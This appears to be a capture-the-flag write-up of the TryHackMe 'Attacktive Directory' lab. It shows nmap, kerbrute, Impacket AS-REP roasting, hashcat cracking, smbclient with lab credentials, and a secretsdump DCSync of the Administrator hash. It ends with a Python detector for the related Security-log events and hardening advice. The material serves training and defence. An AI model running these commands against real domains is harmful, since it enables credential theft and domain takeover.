This is a free machine on TryHackMe (THM) that covers Active Directory. The room also gives good hands-on practice with the Impacket toolkit. Let’s begin.
First, let’s scan this target using nmap.
nmap -sC -sV <IP>

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-10-18 04:24:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-10-18T04:24:20+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-10-17T04:06:58
|_Not valid after:  2022-04-18T04:06:58
|_ssl-date: 2021-10-18T04:24:28+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_  Message signing enabled and required
|   date: 2021-10-18T04:24:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.92 seconds
As we can see, a plethora of ports is open, including Kerberos (88/tcp). Let’s use kerbrute to brute-force valid usernames against it. Before running it, make sure you have added the target IP to /etc/hosts under the domain name spookysec.local. A user list and a password list are already provided by the room’s creator.
To find accounts that are AS-REP roastable (no Kerberos pre-authentication required) and pull their AS-REP hashes from the Key Distribution Centre, we use GetNPUsers.py from Impacket:
python3 GetNPUsers.py -dc-ip spookysec.local spookysec.local/ -usersfile ~/THM/Attacktivedirec/user.txt -no-pass
Copy this hash and use hashcat to crack it.
hashcat -a 0 -m 18200 hash.txt passwordlist.txt --force
The cracked password is svc-admin:management2005. We will use this credential to list the shares on the domain controller (smbclient takes the password after a % in the -U argument; its -P flag means something else):
smbclient -L \\\\IP\\ -U 'svc-admin%management2005'
Well, it is the backup account for the Domain Controller. As the room puts it: “This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. Knowing this, we can use another tool within Impacket called ‘secretsdump.py’. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.”
Let’s use secretsdump.py:
python3 secretsdump.py spookysec.local/backup:email@example.com -just-dc-user Administrator
This output gives us the Administrator’s credentials. Now we can use them to get admin access over WinRM.
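From the defender’s side, the two techniques used above (AS-REP roasting of svc-admin and the DCSync-style dump with the backup account) each leave a distinctive trace in the domain controller’s Security log. The following is an added example, not code from the writeup or from Impacket: it scans constructed event records shaped like Windows events 4768 (TGT request) and 4662 (object access) and flags the two signatures. Field names, sample values and the event layout are assumptions for illustration.

```python
# Added example (not part of the original writeup): flag the DC-side events that
# AS-REP roasting and DCSync leave behind. Input is a constructed list of
# Security event records as dicts; keys mirror the EventData names of 4768/4662.

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Normal TGT request: pre-authentication used (type 2), AES (0x12)
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    # AS-REP roast signature: no pre-auth (type 0) and RC4 (0x17) requested
    {"EventID": 4768, "TargetUserName": "svc-admin", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
    # DCSync signature: replication rights exercised by a non-DC user account
    {"EventID": 4662, "SubjectUserName": "backup", "Properties":
     "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Legitimate replication by a domain controller machine account
    {"EventID": 4662, "SubjectUserName": "ATTACKTIVEDIREC$", "Properties":
     "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

# Control-access-right GUIDs that secretsdump's DCSync path exercises.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}


def classify(event):
    """Return an alert string for a suspicious event, or None if it looks benign."""
    eid = event.get("EventID")
    if eid == 4768:
        # An account with DONT_REQ_PREAUTH set logs pre-auth type 0; pairing that
        # with an RC4 (0x17) ticket is the classic offline-cracking request.
        if event.get("PreAuthType") == "0" and event.get("TicketEncryptionType") == "0x17":
            return f"AS-REP roast: {event['TargetUserName']} from {event.get('IpAddress')}"
    elif eid == 4662:
        guids = {g.strip("{}").lower() for g in event.get("Properties", "").split()}
        # Replication rights should only be used by DC machine accounts (name ends in $).
        if guids & REPL_GUIDS and not event.get("SubjectUserName", "").endswith("$"):
            return f"DCSync-style replication by {event['SubjectUserName']}"
    return None


def scan(events):
    """Run classify() over every record and return the list of alerts."""
    return [alert for alert in (classify(e) for e in events) if alert]


if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

The hardening that removes the first signature is clearing “Do not require Kerberos preauthentication” on service accounts; the second is addressed by auditing which non-DC principals hold replication rights on the domain object.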